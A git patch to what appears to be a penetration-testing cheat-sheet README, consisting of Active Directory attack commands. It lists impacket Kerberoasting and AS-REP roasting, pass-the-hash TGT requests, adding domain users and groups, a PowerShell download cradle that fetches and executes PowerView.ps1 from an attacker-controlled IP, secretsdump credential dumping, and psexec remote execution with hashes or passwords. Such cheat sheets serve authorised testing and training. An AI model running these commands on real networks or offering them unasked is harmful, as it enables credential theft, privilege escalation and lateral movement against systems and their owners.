From f718feded7a1cf0b41220ad61bb54e0e636e22b0 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Tue, 6 Sep 2022 10:56:58 -0400
Subject: [PATCH] Update README.md

---
 README.md | 10 +++-------
 1 file changed, 3 insertions(+), 7 deletions(-)

diff --git a/README.md b/README.md
index 5647587..cf46495 100644
--- a/README.md
+++ b/README.md
@@ -670,16 +670,11 @@ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request {DOMAIN
 
 # ASREP ROAST
 python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN}/ -dc-ip {IP ADDRESS} -format john
-
 python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
 
-# Request the TGT with hash
+# Request the TGT with hash, AES key, or password
 python3 /usr/share/doc/python3-impacket/examples/getTGT.py {DOMAIN}/{USERNAME} -hashes {LM HASH}:{NTLM HASH}
-
-# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
 python getTGT.py {DOMAIN}/{USERNAME} -aesKey {AES KEY}
-
-# Request the TGT with password
 python getTGT.py {DOMAIN}/{USERNAME}:{PASSWORD}
 
 # Bloodhound
@@ -693,6 +688,7 @@ net user {USERNAME} {PASSWORD} /add /domain
 # Add user to group
 net group "{GROUP}" {USERNAME} /add
 
+# Powerview example
 IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1")
 $pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force
 $cred = New-Object System.Management.Automation.PSCredential('{DOMAIN}\{USERNAME}', $pass)
@@ -703,7 +699,7 @@ sudo python3 /usr/share/doc/python3-impacket/examples/secretsdump.py '{DOMAIN}/{
 
 # PSEXEC
 sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes {HASH1:HASH2} {USERNAME}@{IP ADDRESS}
-
+sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py {USERNAME}:{PASSWORD}@{IP ADDRESS}
 ```